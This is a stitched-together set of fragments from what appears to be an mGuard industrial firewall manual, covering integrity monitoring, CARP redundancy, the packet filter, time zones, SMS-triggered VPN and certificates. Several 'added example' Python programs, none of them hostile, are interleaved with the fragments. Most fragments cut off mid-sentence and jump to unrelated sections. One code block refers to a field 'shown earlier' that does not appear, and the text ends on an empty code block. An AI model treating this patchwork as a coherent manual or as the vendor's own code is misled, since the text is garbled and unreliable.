2. When cycles are close together (e.g. Pull Schedule: 15 minutes), the mGuard must be prevented from repeatedly testing a configuration profile that might be faulty at intervals that are too short. This can hinder or prevent external administrative access, as the mGuard might be too busy dealing with its own processes.
3. External factors (e.g. network failure) must be largely ruled
running at the scheduled start time of the next check, that next check will not be run.

Please note: If a configuration change schedules a check to start less than one minute in the future, it will not start at that time but at its next interval.

Please note: Continuous scanning may take up to 10 minutes to start.

Checksum Memory: To be stored on CIFS share.
Checksum Algorithm: SHA-256.
Basename of the checksum files: may be prefixed with a directory.
[Status shown: Mounted and usable (integrity check).]

CIFS Integrity Monitoring >> CIFS Integrity Checking >> Settings >> Edit >> Checked Share

Settings

Enabled:
- No: a check is not triggered for this network drive. The mGuard has not connected this drive. The status cannot be viewed.
- Yes: a check is triggered regularly for this network drive.
- Suspended: the check has been suspended until further notice. The status can be viewed.

Checked CIFS Share: Name of the network drive to be checked, specified under CIFS Integrity Monitoring >> Importable Shares >> Edit.

Patterns for filenames: Specific file types are checked, e.g. only executable files such as .exe and .dll. The rules can be defined under CIFS Integrity Monitoring >> CIFS Integrity Checking >> Filename Patterns. Do not check files that are changed in normal operation, as this would trigger false alarms. Do not check files that are simultaneously
Monitoring >> Importable Shares on page 230).
- What type of access is permitted (see CIFS Integrity Monitoring >> CIFS Integrity Checking >> Settings on page 233).
- At what intervals the drives should be checked (see CIFS Integrity Monitoring >> CIFS Integrity Checking >> Settings >> Edit >> Checked Share on page 235).
- Which file types should be checked (see CIFS Integrity Monitoring >> CIFS Integrity Checking >> Filename Patterns on page 240).
- Warning method when a change is detected, e.g. via e-mail (see CIFS Integrity Monitoring >> CIFS Integrity Checking >> Settings on page 233) or via SNMP (see CIFS integrity traps on page 87).

Setting options for the CIFS Antivirus Scan Connector:
- Which network drives are known to the mGuard (see CIFS Integrity Monitoring >> Importable Shares on page 230).
- What type of access is permitted, read or read/write (see CIFS Integrity Monitoring >> CIFS AV Scan Connector on page 242).

Requirements

9.1 CIFS Integrity Monitoring >> Importable Shares

The network drives that the mGuard should check regularly can be specified here. In order for the network drives to be checked, you must also refer to these network drives in one of the two methods: CIFS integrity checking or CIFS
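The check described on these pages (a SHA-256 checksum file per share, restricted to filename patterns such as .exe and .dll, with an alarm on any deviation) is easy to reason about once written out. The following is an added example, not the mGuard's CIFS Integrity Checking implementation: it represents the share as a local directory (assumption: a mounted CIFS share looks the same to the code), stores the checksums as a JSON file, and reports added, removed and changed files. The sample directory contents are constructed inside demo().

```python
"""Baseline-and-compare integrity check over a directory tree, limited to filename patterns.

Added example, not mGuard code. Mirrors the mechanism described in the manual:
SHA-256 checksums per checked share, filename patterns, report of deviations.
"""
import fnmatch
import hashlib
import json
import os
import tempfile
from pathlib import Path
from typing import Dict, Iterable

# Assumed default patterns; the manual only names .exe and .dll as examples.
DEFAULT_PATTERNS = ("*.exe", "*.dll")


def _matches(name: str, patterns: Iterable[str]) -> bool:
    return any(fnmatch.fnmatch(name.lower(), p.lower()) for p in patterns)


def sha256_file(path: Path, chunk: int = 1 << 20) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(share_root, patterns=DEFAULT_PATTERNS) -> Dict[str, str]:
    """Map relative path -> SHA-256 for every file under share_root matching a pattern."""
    root = Path(share_root)
    manifest: Dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if _matches(name, patterns):
                p = Path(dirpath) / name
                manifest[p.relative_to(root).as_posix()] = sha256_file(p)
    return manifest


def save_manifest(manifest: Dict[str, str], checksum_file) -> None:
    Path(checksum_file).write_text(json.dumps(manifest, indent=1, sort_keys=True))


def load_manifest(checksum_file) -> Dict[str, str]:
    return json.loads(Path(checksum_file).read_text())


def compare(baseline: Dict[str, str], current: Dict[str, str]) -> dict:
    """Deviations between the stored baseline and the current scan."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(k for k in set(baseline) & set(current) if baseline[k] != current[k])
    return {"added": added, "removed": removed, "changed": changed}


def check_share(share_root, checksum_file, patterns=DEFAULT_PATTERNS) -> dict:
    """One check run. The first run writes the baseline; later runs report deviations.
    The checksum file itself must not match a pattern, or keep it outside the share."""
    current = build_manifest(share_root, patterns)
    if not Path(checksum_file).exists():
        save_manifest(current, checksum_file)
        return {"added": [], "removed": [], "changed": [], "baseline_created": True}
    result = compare(load_manifest(checksum_file), current)
    result["baseline_created"] = False
    return result


def demo() -> dict:
    """Constructed share: baseline, then tamper/add/remove, then re-check."""
    with tempfile.TemporaryDirectory() as tmp:
        share = Path(tmp) / "share"
        (share / "bin").mkdir(parents=True)
        (share / "bin" / "app.exe").write_bytes(b"MZ original")
        (share / "bin" / "lib.dll").write_bytes(b"MZ lib")
        (share / "bin" / "notes.txt").write_bytes(b"not covered by the patterns")
        sums = Path(tmp) / "share.sha256.json"      # kept outside the share
        first = check_share(share, sums)
        (share / "bin" / "app.exe").write_bytes(b"MZ tampered")   # changed
        (share / "bin" / "evil.dll").write_bytes(b"MZ new")        # added
        (share / "bin" / "lib.dll").unlink()                       # removed
        (share / "bin" / "notes.txt").write_bytes(b"changed, still ignored")
        second = check_share(share, sums)
    return {"first": first, "second": second}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

The manual's advice to exclude files that change in normal operation corresponds to keeping them out of the patterns: notes.txt changes above without raising an alarm, while the executables are reported.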
only then use this method. After that, follow these steps:
- Replace the incorrect password with a different one.
- Enter this password on the active mGuard too.
- Restart the mGuard that is not active. You can do this, for example, by reconnecting the Ethernet cable or by restoring the old settings for the connectivity check.

Redundancy >> Firewall Redundancy >> Redundancy

Virtual interfaces

External virtual router ID: 1 to 255, default 51. Only in Router network mode. This ID is sent by the redundant pair with each presence notification (CARP) via the external interface and is used to identify the redundant pair. This ID must be the same for both mGuard devices. It is used to differentiate the redundant pair from other redundant pairs that are connected to the same Ethernet segment through their external interface. Please note that CARP uses the same protocol and port as VRRP (Virtual Router Redundancy Protocol). The ID set here must be different from the IDs of other devices that use VRRP or CARP and are located in the same Ethernet segment.

External virtual IP addresses: Default 10.0.0.100. Only in Router network mode. These are IP addresses that are shared by both mGuard devices as virtual IP addresses of the external interface. These IP addresses must be the same for both mGuard devices. These addresses are used as a ga
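The warning above about VRRP IDs is worth checking on the wire before enabling redundancy. The following added example (not mGuard code) parses IP protocol 112 advertisements from raw Ethernet frames and reports router IDs that are sent by hosts other than the two members of a pair you administer. CARP deliberately reuses the VRRPv2 version/type byte (0x21) and carries its vhid in the same position as the VRRP Virtual Rtr ID, so the two cannot be told apart reliably from the header, which is exactly why the ID must be unique across both protocols on a segment. The frames below are constructed (their checksums and CARP HMACs are placeholders), and the pair's addresses 10.0.0.1 and 10.0.0.2 are assumptions.

```python
"""Find virtual router ID clashes among IP protocol 112 (VRRP/CARP) advertisements.

Added example, not mGuard code. Frames are constructed, not captured.
"""
import struct
from collections import defaultdict
from typing import Dict, Iterable, Optional, Set, Tuple

ETH_HDR = struct.Struct("!6s6sH")             # dst MAC, src MAC, ethertype
IPV4_HDR = struct.Struct("!BBHHHBBH4s4s")     # ver/ihl, tos, len, id, flags, ttl, proto, cksum, src, dst
PROTO_VRRP_CARP = 112
ALL_VRRP_ROUTERS = bytes([224, 0, 0, 18])


def parse_adv(frame: bytes) -> Optional[Tuple[str, str, int]]:
    """Return (src_mac, src_ip, router_id) for a VRRP/CARP advertisement, else None."""
    if len(frame) < ETH_HDR.size + IPV4_HDR.size:
        return None
    _dst, src_mac, ethertype = ETH_HDR.unpack_from(frame, 0)
    if ethertype != 0x0800:
        return None
    ip = IPV4_HDR.unpack_from(frame, ETH_HDR.size)
    if ip[0] >> 4 != 4 or ip[6] != PROTO_VRRP_CARP:
        return None
    off = ETH_HDR.size + (ip[0] & 0x0F) * 4
    if len(frame) < off + 2:
        return None
    ver_type, router_id = frame[off], frame[off + 1]
    if ver_type >> 4 not in (2, 3):          # VRRPv2 and CARP use 2, VRRPv3 uses 3
        return None
    return src_mac.hex(":"), ".".join(map(str, ip[8])), router_id


def build_adv(src_mac: str, src_ip: str, router_id: int, carp: bool = True) -> bytes:
    """Construct a minimal advertisement frame. Checksums/HMAC are zero placeholders."""
    if carp:
        # CARP: ver/type 0x21, vhid, advskew, authlen 7, demotion, advbase, cksum, counter(8), HMAC(20)
        body = struct.pack("!BBBBBBH", 0x21, router_id, 0, 7, 0, 1, 0) + b"\x00" * 28
    else:
        # VRRPv2: ver/type 0x21, vrid, priority, count_ip 1, authtype 0, adver_int 1, cksum, addr, auth(8)
        body = struct.pack("!BBBBBBH", 0x21, router_id, 100, 1, 0, 1, 0) + bytes([10, 0, 0, 100]) + b"\x00" * 8
    ip = IPV4_HDR.pack(0x45, 0, IPV4_HDR.size + len(body), 0, 0, 255, PROTO_VRRP_CARP, 0,
                       bytes(map(int, src_ip.split("."))), ALL_VRRP_ROUTERS)
    eth = ETH_HDR.pack(bytes.fromhex("01005e000012"), bytes.fromhex(src_mac.replace(":", "")), 0x0800)
    return eth + ip + body


def scan_segment(frames: Iterable[bytes], expected: Dict[int, Set[str]]) -> dict:
    """expected: {router_id: {sender IPs of the pair you administer}}.
    clashes: IDs you use that some other sender also advertises.
    foreign_ids: IDs present on the segment that you do not use (avoid these when choosing yours)."""
    seen: Dict[int, Set[str]] = defaultdict(set)
    for frame in frames:
        parsed = parse_adv(frame)
        if parsed:
            _mac, ip, rid = parsed
            seen[rid].add(ip)
    clashes = {rid: sorted(ips - expected[rid]) for rid, ips in seen.items()
               if rid in expected and ips - expected[rid]}
    foreign = sorted(rid for rid in seen if rid not in expected)
    return {"clashes": clashes, "foreign_ids": foreign}


def demo() -> dict:
    frames = [
        build_adv("00:00:5e:00:01:33", "10.0.0.1", 51, carp=True),      # mGuard A of the pair
        build_adv("00:00:5e:00:01:33", "10.0.0.2", 51, carp=True),      # mGuard B of the pair
        build_adv("00:00:5e:00:01:33", "10.0.0.254", 51, carp=False),   # a VRRP router also using 51
        build_adv("00:00:5e:00:01:0a", "10.0.0.9", 10, carp=False),     # unrelated VRRP group
        b"\x00" * 40,                                                   # noise, ignored
    ]
    return scan_segment(frames, {51: {"10.0.0.1", "10.0.0.2"}})


if __name__ == "__main__":
    print(demo())
```

On a real segment the frames would come from a capture of protocol 112 traffic on the external interface; a non-empty clashes entry means the router ID chosen in the dialog above is already in use and must be changed.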
minor release for versions (release X.y.Z, e.g. 3.1.0 or 4.0.1 respectively).

Management >> Update

Update Servers: Specify from which servers an update may be performed.
- The list of servers is processed from top to bottom until an available server is found. The order of the entries therefore also specifies their priority.
- All configured update servers must provide the same updates.

The following options are available:
- Protocol: The update can be performed via HTTPS or HTTP.
- Server: Host name of the server that provides the update files.
- Via VPN: The update is performed via the VPN tunnel. Default: No. Updates via VPN are not supported if the relevant VPN tunnel has been disabled in the configuration (see IPsec VPN >> Connections) and has only been temporarily opened via the service contact or the CGI interface.
- Login: Login for the server.
- Password: Password for the login.

4.4 Management >> Configuration Profiles

4.4.1 Configuration Profiles

[Screen: Management >> Configuration Profiles >> Configuration Profiles. The list shows the stored profiles (e.g. Factory Default) with Download/Apply actions; Save Current Configuration to Profile: Name for the new profile (note: only changes that are already applied are saved); Upload Configuration to Profile: Name for the new profile.]
connections (seconds): the period for which packets belonging to a closed TCP connection remain blocked after the connection is closed. This is necessary because packets belonging to the closed TCP connection may still arrive in a packet-based network after the connection is closed. Without time-controlled blocking, old packets could accidentally be assigned to a new connection. The default setting is 3600 seconds (1 hour).

Abort existing connections upon firewall reconfiguration: Yes/No, default Yes. When set to Yes, existing connections are reset if the following applies:
- Yes is set under Allow TCP connections upon SYN only, and
- the firewall rules have been adjusted, or the value was changed from No to Yes even without changing the firewall rules.
After changing the firewall rules, the mGuard behaves in the same way as after a restart. However, this only applies to the forwarded connections. Existing TCP connections are interrupted even if they are allowed according to the new firewall rules. Connections to the device itself are not affected, even if the firewall rules for remote access have been changed. If set to No, the connections remain even if the changed firewall rules would not allow them or would abort them.

FTP: Yes/No. If an outgoing connection is established to call data via the FTP protocol, two methods of data transmission can be used. With active FTP, the called server establishes an additional counter-connection to the caller in order to transmit data over this connection
Transmission protocol: Devices that communicate with each other must follow the same rules; they have to speak the same language. Rules and standards of this kind are called protocols or transmission protocols. Some of the more frequently used protocols are IP, TCP, PPP, HTTP and SMTP.

Service provider: Service providers are companies or institutions that enable users to access the Internet or online services.

Spoofing, anti-spoofing: In Internet terminology, spoofing means supplying a false address. Using this false address, a user can create the illusion of being an authorized user. Anti-spoofing is the term for mechanisms that detect or prevent spoofing.

Symmetrical encryption: In symmetrical encryption the same key is used to encrypt and decrypt data. Two examples of symmetrical encryption algorithms are DES and AES (DES is obsolete and no longer considered secure; AES is the current standard). They are fast but become increasingly difficult to administer as the number of users increases, because every pair of communicating parties needs a shared key.

TCP/IP (Transmission Control Protocol/Internet Protocol): These are network protocols used to connect two computers on the Internet. IP is the base protocol. UDP is based on IP and sends individual packets; the packets may reach the recipient in a different order than that in which they were sent, or they may even be lost. TCP provides a reliable connection and ensures, for example, that data packets are forwarded to the application in the correct order. UDP and TCP add port numbers between 1 and

VLAN
Management >> System Settings >> Time and Date

System time state: Indicates whether the mGuard system time has ever been synchronized with a currently valid time during mGuard run time. If the display indicates that the mGuard system time has not been synchronized, the mGuard does not perform any time-controlled activities.

Devices without a built-in clock always start in "Not synchronized" mode. Devices with an integrated clock usually start in "Synchronized by hardware clock" mode. The state of the clock only returns to "Not synchronized" if the firmware is reinstalled on the device or if the built-in clock has been disconnected from the power for too long.

Power supply of the integrated clock is ensured by the following components:
- Capacitor: mGuard rs4000/rs2000 3G, mGuard industrial rs
- Battery: mGuard centerport, mGuard delta
- Accumulator: mGuard rs4000/rs2000, mGuard pci(SD), mGuard delta, mGuard smart
In the case of the mGuard rs4000/rs2000, the accumulator lasts at least five days.

Management >> System Settings >> Time and Date

Time-controlled activities

Time-controlled pick-up of the configuration from a configuration server: This is the case when the Time Schedule setting is selected for the Pull Schedule under the Management >> Central Management >> Configuration Pull menu item.
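Both Time and Date passages (the POSIX.1 timezone field shown earlier with the value CET-1CEST,M3.5.0,M10.5.0/3, and the system-time state described here) hinge on how a POSIX TZ string turns a UTC clock into local time. The following added example, which is not mGuard code, implements the std/dst/Mm.w.d rule subset that the page's own example uses: it parses the string, computes the two DST transition instants for a year, and converts a UTC time stamp such as the 12:57:43 UTC / 14:57:43 local pair shown in the screenshot. Only the Mm.w.d rule form is implemented; the Jn and n day-of-year forms of POSIX are omitted.

```python
"""Evaluate a POSIX.1 TZ string (std offset [dst [offset] ,start ,end] with Mm.w.d rules).

Added example, not mGuard code. Supports the rule form used on the Time and Date page.
Remember: POSIX offsets are positive WEST of UTC, so "CET-1" means UTC+1.
"""
import re
from dataclasses import dataclass
from datetime import date, datetime, timedelta, timezone
from typing import Optional, Tuple

EXAMPLE_TZ = "CET-1CEST,M3.5.0,M10.5.0/3"   # the value shown on the page

_OFFSET = r"[+-]?\d{1,2}(?::\d{2}(?::\d{2})?)?"
_RULE = r"M\d{1,2}\.[1-5]\.[0-6](?:/" + _OFFSET + r")?"
_TZ_RE = re.compile(
    rf"^(?P<std>[A-Za-z]{{3,}})(?P<stdoff>{_OFFSET})"
    rf"(?:(?P<dst>[A-Za-z]{{3,}})(?P<dstoff>{_OFFSET})?,(?P<start>{_RULE}),(?P<end>{_RULE}))?$"
)


def _parse_hms(text: str) -> timedelta:
    """'[+-]hh[:mm[:ss]]' -> signed timedelta."""
    sign = -1 if text.startswith("-") else 1
    parts = [int(p) for p in text.lstrip("+-").split(":")]
    parts += [0] * (3 - len(parts))
    return sign * timedelta(hours=parts[0], minutes=parts[1], seconds=parts[2])


def _parse_offset(text: str) -> timedelta:
    """POSIX west-positive offset -> east-positive UTC offset."""
    return -_parse_hms(text)


@dataclass(frozen=True)
class Rule:
    month: int
    week: int       # 1..5, 5 = last occurrence of that weekday in the month
    weekday: int    # 0 = Sunday .. 6 = Saturday
    at: timedelta   # local wall-clock time of the switch, default 02:00:00

    @classmethod
    def parse(cls, text: str) -> "Rule":
        mwd, _, at = text[1:].partition("/")
        m, w, d = (int(x) for x in mwd.split("."))
        return cls(m, w, d, _parse_hms(at) if at else timedelta(hours=2))

    def date_in(self, year: int) -> date:
        first = date(year, self.month, 1)
        first_dow = (first.weekday() + 1) % 7            # Python Monday=0 -> POSIX Sunday=0
        day = 1 + (self.weekday - first_dow) % 7 + (self.week - 1) * 7
        next_month = date(year + (self.month == 12), self.month % 12 + 1, 1)
        days_in_month = (next_month - timedelta(days=1)).day
        while day > days_in_month:                        # week 5 means "last": step back
            day -= 7
        return date(year, self.month, day)


@dataclass(frozen=True)
class PosixTz:
    std_name: str
    std_offset: timedelta
    dst_name: Optional[str] = None
    dst_offset: Optional[timedelta] = None
    start: Optional[Rule] = None
    end: Optional[Rule] = None

    def transitions_utc(self, year: int) -> Optional[Tuple[datetime, datetime]]:
        if self.start is None:
            return None
        midnight = datetime.min.time()
        start_local = datetime.combine(self.start.date_in(year), midnight) + self.start.at
        end_local = datetime.combine(self.end.date_in(year), midnight) + self.end.at
        # the start rule is stated in standard time, the end rule in DST time
        return ((start_local - self.std_offset).replace(tzinfo=timezone.utc),
                (end_local - self.dst_offset).replace(tzinfo=timezone.utc))

    def is_dst(self, utc_dt: datetime) -> bool:
        tr = self.transitions_utc(utc_dt.year)
        if tr is None:
            return False
        start, end = tr
        if start < end:
            return start <= utc_dt < end
        return not (end <= utc_dt < start)               # southern hemisphere rules

    def to_local(self, utc_dt: datetime) -> datetime:
        utc_dt = utc_dt.replace(tzinfo=timezone.utc) if utc_dt.tzinfo is None else utc_dt.astimezone(timezone.utc)
        if self.is_dst(utc_dt):
            return utc_dt.astimezone(timezone(self.dst_offset, self.dst_name))
        return utc_dt.astimezone(timezone(self.std_offset, self.std_name))


def parse_posix_tz(text: str) -> PosixTz:
    m = _TZ_RE.match(text)
    if not m:
        raise ValueError(f"unsupported TZ string: {text!r}")
    std_offset = _parse_offset(m["stdoff"])
    if m["dst"] is None:
        return PosixTz(m["std"], std_offset)
    dst_offset = _parse_offset(m["dstoff"]) if m["dstoff"] else std_offset + timedelta(hours=1)
    return PosixTz(m["std"], std_offset, m["dst"], dst_offset, Rule.parse(m["start"]), Rule.parse(m["end"]))


def local_time_string(tz_text: str, utc_iso: str) -> str:
    loc = parse_posix_tz(tz_text).to_local(datetime.fromisoformat(utc_iso))
    return loc.strftime("%Y-%m-%d %H:%M:%S ") + loc.tzname()


def transition_strings(tz_text: str, year: int) -> Optional[Tuple[str, str]]:
    tr = parse_posix_tz(tz_text).transitions_utc(year)
    return None if tr is None else tuple(t.strftime("%Y-%m-%d %H:%M UTC") for t in tr)


if __name__ == "__main__":
    print(local_time_string(EXAMPLE_TZ, "2014-08-04T12:57:43"))
    print(transition_strings(EXAMPLE_TZ, 2014))
```

A useful sanity check before saving the field: compute the year's transitions and confirm they fall where the local regulation says (for the EU string above, the last Sundays of March and October at 01:00 UTC). A wrong sign on the offset is the classic mistake and shows up immediately as a local time two hours off.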
Enter the desired profile name in the Name for the new profile field next to Upload Configuration to Profile.
- Click on Browse, select the relevant file in the dialog box that is displayed and open it.
- Click on Upload.
The configuration profile is loaded onto the mGuard and the name assigned in step 1 appears in the list of profiles already stored on the mGuard.

Current state of the ECS: The current state is updated dynamically. See State of the External Configuration Storage (ECS) in the Event table on page 53.

Save the current configuration to an ECS: Only for mGuard rs4000/rs2000 3G, mGuard rs4000/rs2000, mGuard delta, mGuard pci(SD), mGuard pcie(SD), EAGLE mGuard and mGuard centerport. When replacing the original device with a replacement device, the configuration profile of the original device can be applied using the ECS. To do so, the replacement device must still use root as the password for the root user. If the root password on the replacement device is not root, this password must be entered in the field The root password to save to the ECS. See Saving a profile to an external storage medium.

Automatically save configuration changes to an ECS: Only for mGuard rs4000/rs2000 3G, mGuard rs4000/rs2000, mGuard delta, mGuard pci(SD), mGuard pcie(SD), EAGLE mGuard and mGuard centerport. When set to Yes, the configuration changes are a
Interfaces >> Dial-out

PAP server authentication: Yes/No. The following two entry fields are shown when Yes is selected.
Server user name, Server password: User name and password that the mGuard requests from the server. The mGuard only allows the connection if the server returns the agreed user name/password combination.
Subsequent fields: See under "If None is selected as the authentication method" on page 133.

If authentication is via CHAP

[Screen: Authentication: CHAP; Local name; Remote name; Secret for client authentication; CHAP server authentication: No; Dial on demand: Yes; Idle timeout: Yes; Idle time (seconds): 300; Local IP: 0.0.0.0; Remote IP: 0.0.0.0; Netmask: 0.0.0.0.]

Local name: A name for the mGuard that it uses to log into the Internet service provider. The service provider may have several customers and uses this name to identify who is attempting to dial in. After the mGuard has logged into the Internet service provider with this name, the service provider also compares the password specified for client authentication (see below). The connection can only be established successfully if the name is known to the service provider and the password matches.

Remote name: A name given to the mGuard by the Internet service provider for id
to protect a slow computer in the protected network from overloading. The Egress Queues feature can be used for all interfaces and for VPN connections.

12.2.1 Internal / External / External 2 / Dial-in

The four tab pages under QoS >> Egress Queues have the same layout:
- Internal: settings for egress queues on the LAN interface
- External: settings for egress queues on the external (WAN) interface
- External 2: settings for egress queues on the secondary external interface
- Dial-in: settings for egress queues for packets of a PPP dial-up connection (dial-in)

Each page shows:
- Enabling: Enable Egress QoS (default No)
- Total Bandwidth Rate: Bandwidth Rate Limit (default unlimited, in kbit/s)
- Queues: 1 Urgent (unlimited, priority High); 2 Important (unlimited, priority Medium); 3 Default (unlimited, priority Medium); 4 Low Priority (unlimited, priority Low)
no umlauts, no special characters, no control characters. The text is freely definable. You can use blocks from the event table, which can be inserted as wildcards in plain text (A and V) or in machine-readable form (a and v).

Incoming text messages can be used to start or stop VPN connections. The text message must contain a preconfigured token and the corresponding command for the relevant VPN connection.

Text message command: vpn start <token> / vpn stop <token>. The token is defined in the VPN settings (IPsec VPN >> Connections >> Edit >> General, Token for text message trigger).

Last incoming text message: Displays the last text message received.

Current incoming voice call: Displays the telephone number of the current incoming caller.

Send text message
- Recipient number: Enter the telephone number of the recipient of the text message (22 characters maximum).
- Message: Enter the text that is sent as a text message (160 characters maximum, 7-bit ASCII, no umlauts, no special characters, no control characters).
- Send text message now: The message is sent when you click the button.

6.7.4 Positioning system

[Screen: Network >> Interfaces, tabs General, SIM Settings, Text message, Notifications, Positioning system. Settings: Enable Positioning engine: Yes; Update System time: Yes; Current position; Validity of the po
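The token in "vpn start <token>" is the only thing authenticating an SMS that opens or closes a tunnel, so the parser that handles it deserves care. The following is an added example, not the mGuard's own parser: it enforces the message constraints stated above (7-bit printable ASCII, at most 160 characters), accepts only the two documented commands, and compares the supplied token against every configured connection's token with a constant-time comparison and without early exit. The connection names and tokens are constructed for the example.

```python
"""Validate 'vpn start <token>' / 'vpn stop <token>' text-message commands.

Added example, not mGuard code. Connection names and tokens are constructed.
"""
import hmac
from typing import Dict, Optional, Tuple

MAX_SMS_LEN = 160
COMMANDS = ("start", "stop")


def is_gsm_safe(text: str) -> bool:
    """Page constraints for text messages: <= 160 chars, printable 7-bit ASCII only."""
    return len(text) <= MAX_SMS_LEN and all(32 <= ord(c) < 127 for c in text)


def parse_command(text: str, connections: Dict[str, str]) -> Optional[Tuple[str, str]]:
    """connections maps connection name -> configured token.
    Returns (action, connection name) or None if the message is not a valid command."""
    if not is_gsm_safe(text):
        return None
    parts = text.strip().split()
    if len(parts) != 3 or parts[0] != "vpn" or parts[1] not in COMMANDS:
        return None
    supplied = parts[2].encode("ascii")
    matched = None
    # Compare against every token, no early exit: the time taken must not reveal which
    # connection (if any) matched. compare_digest still returns fast on a length mismatch,
    # so use tokens of one fixed length.
    for name, token in connections.items():
        if hmac.compare_digest(token.encode("ascii"), supplied):
            matched = name      # tokens are assumed unique per connection
    return (parts[1], matched) if matched else None


# Constructed configuration: two VPN connections with their text-message trigger tokens.
CONNECTIONS = {
    "plant-a": "Qv7mZk2pR9sLw4Hd",
    "plant-b": "T3nX8bYc6fJq1GeK",
}


def demo() -> dict:
    return {
        "good": parse_command("vpn start Qv7mZk2pR9sLw4Hd", CONNECTIONS),
        "stop": parse_command(" vpn  stop T3nX8bYc6fJq1GeK ", CONNECTIONS),
        "wrong_token": parse_command("vpn start Qv7mZk2pR9sLw4Hx", CONNECTIONS),
        "bad_command": parse_command("vpn restart Qv7mZk2pR9sLw4Hd", CONNECTIONS),
        "non_ascii": parse_command("vpn start Qv7mZk2pR9sLw4Hd\u00e4", CONNECTIONS),
        "too_long": parse_command("vpn start " + "A" * 151, CONNECTIONS),
    }


if __name__ == "__main__":
    print(demo())
```

Anything that is not exactly one of the two commands with a known token is ignored rather than answered, so an attacker probing by SMS receives no feedback beyond whether the tunnel came up.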
locally installed remote certificate on the mGuard.

To check the authenticity of possible partners in accordance with X.509, the method described below of consulting CA certificates can be used instead, or as an additional measure, depending on the application.

CA certificates provide a way of checking whether the certificate shown by the partner is really signed by the CA specified in the partner's certificate. A CA certificate is available as a file from the relevant CA (file name extension .cer, .pem or .crt). For example, this file may be available for download from the website of the relevant CA. The mGuard can then check whether the certificate shown by the partner is authentic using the CA certificates loaded on the mGuard. However, this requires all CA certificates to be made available to the mGuard that are needed to form a chain with the certificate shown by the partner. In addition to the CA certificate of the CA whose signature appears on the certificate to be checked, this includes the CA certificate of the superordinate CA, and so forth up to the root certificate (see glossary under CA certificate on page 357).

Authentication using CA certificates makes it possible to extend the number of possible partners without any increased management effort, because it is not compulsory to install a remote certificate for each possible partner. The trade-off is that every holder of a certificate from that CA is then accepted unless remote certificates are additionally used as a filter (see below).

Creation of certificates

To
methods are defined:
- Login restricted to X.509 client certificate
- Login with X.509 client certificate or password

You must then specify how the mGuard authenticates the remote user according to X.509. The table below shows which certificates must be provided for the mGuard to authenticate the user (access via HTTPS) if the user or their browser shows one of the following certificate types when a connection is established:
- a certificate signed by a CA
- a self-signed certificate

For additional information about the table, see Authentication >> Certificates on page 190.

The partner shows the following: (a) a certificate specific to the individual, signed by a CA; (b) a certificate specific to the individual, self-signed.

The mGuard authenticates the partner using:
- for (a): all CA certificates that form the chain to the root CA certificate together with the certificate shown by the partner (1), PLUS, if required, remote certificates if used as a filter;
- for (b): the remote certificate.

(1) The partner can additionally provide sub-CA certificates. In this case the mGuard can form the set union for creating the chain from the CA certificates provided and the self-configured CA certificates. The corresponding root certificate must always be available on the mGuard.

According to this table, the certificates that must be provided are the ones the mGuard uses to authenticate a remote user (access via HTTPS) or their browser. The foll
does not send it, then Stealth configuration must be set to static. In this case further entry fields are available for the Static Stealth Configuration at the bottom of the page.

multiple clients (Default): As with autodetect, but it is possible to connect more than one computer to the LAN port (secure port) of the mGuard, meaning that multiple IP addresses can be used at the LAN port (secure port) of the mGuard.

No/Yes. Only with autodetect stealth configuration: if a Windows computer has more than one network card installed, it may alternate between the different IP addresses for the sender address in the data packets it sends. This applies to network packets that the computer sends to TCP port 139 (NetBIOS). As the mGuard determines the address of the computer from the sender address (and thus the address via which the mGuard can be accessed), the mGuard would have to switch back and forth, and this would hinder operation considerably. To avoid this, set this option to Yes if the mGuard is connected to a computer that has these properties.

Network >> Interfaces >> General, Stealth network mode

Stealth Management IP Address

[Screen: Management IP addresses: 192.168.11.1 / 255.255.255.0 / No / 1; 192.168.5.1 / 255.255.255.0 / No / 1; Default gateway: 192.168.11.10.]

An additional IP address can be specified
of a service on the LAN side creates an entry in the connection tracking table which permits a different incoming request from an external peer. This peer passes the firewall using the same parameters; however, it is not connected to the firewall rule record.

There are two ways to set up the mGuard so that it interrupts the associated connections when deactivating the firewall rule record:
- Activate the Allow TCP connections upon SYN only option under Network Security >> Packet Filter >> Advanced.
- In the firewall, block the outgoing connections that operate via the port that is the destination for the incoming connections. If, for example, the firewall rule record enables incoming data traffic on port 22, an outgoing rule can be set up that drops all data traffic with source port 22.

8.1.5 MAC Filtering

Network Security >> Packet Filter >> MAC Filtering (tabs: Incoming Rules, Outgoing Rules, DMZ, Rule Records, MAC Filtering, Advanced)

[Screen: Incoming: Source MAC xx:xx:xx:xx:xx:xx, Destination MAC xx:xx:xx:xx:xx:xx, Ethernet Protocol %any, Action Accept. Outgoing: Source MAC xx:xx:xx:xx:xx:xx, Destination MAC xx:xx:xx:xx:xx:xx, Ethernet Protocol %any, Action Accept/Drop.]

Ethernet Protocol may be %any, IPv4, ARP, Length, or a hexadecimal value.

Please note: These rules only apply in Stealth mode.

Please note: Management access to 1.1.1.1 requires ARP resolution of the default gateway. Restricting ARP traffic to the default gateway may lead to management access problems.

The Incoming
independently of one another. In this case each mGuard deals with its own tracking information, as the two mGuard devices can no longer communicate via layer 2. A network lobotomy can be triggered by a rare and unfortunate combination of network settings, network failures and firewall redundancy settings. Each mGuard is active during a network lobotomy.

The following occurs after the network lobotomy has been rectified: if the mGuard devices have different priorities, the device with the higher priority becomes active and the other switches to standby. If both mGuard devices have the same priority, an identifier sent with the presence notifications (CARP) determines which mGuard becomes active.

Both mGuard devices manage their own firewall state during the network lobotomy. The mGuard that remains active retains its state. Connections on the other mGuard which were established during the lobotomy are dropped.

Fail-over when establishing complex connections

Complex connections are network protocols which are based on several IP connections. One example of this is the FTP protocol. In FTP, the client establishes a control channel over a TCP connection. The server is then expected to open another TCP connection over which the client can transmit data. The data channel on port 20 of the server is set up while the control channel on port 21 of the server is being established. If the relevant connection tracking function is activated on the mGuard (see
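The network lobotomy described above is a split-brain condition, and the redundancy status names listed earlier in this chapter (on_standby, becomes_active, active, active_waiting and so on) are enough to detect it from monitoring data. The following is an added example, not mGuard code: it takes constructed state snapshots of a primary and a secondary device, reports every interval in which both were in an active state at once, and applies the recovery rule stated above (higher priority wins; equal priorities are left to the CARP identifier). The snapshot format and the device names are assumptions; the state names are the manual's.

```python
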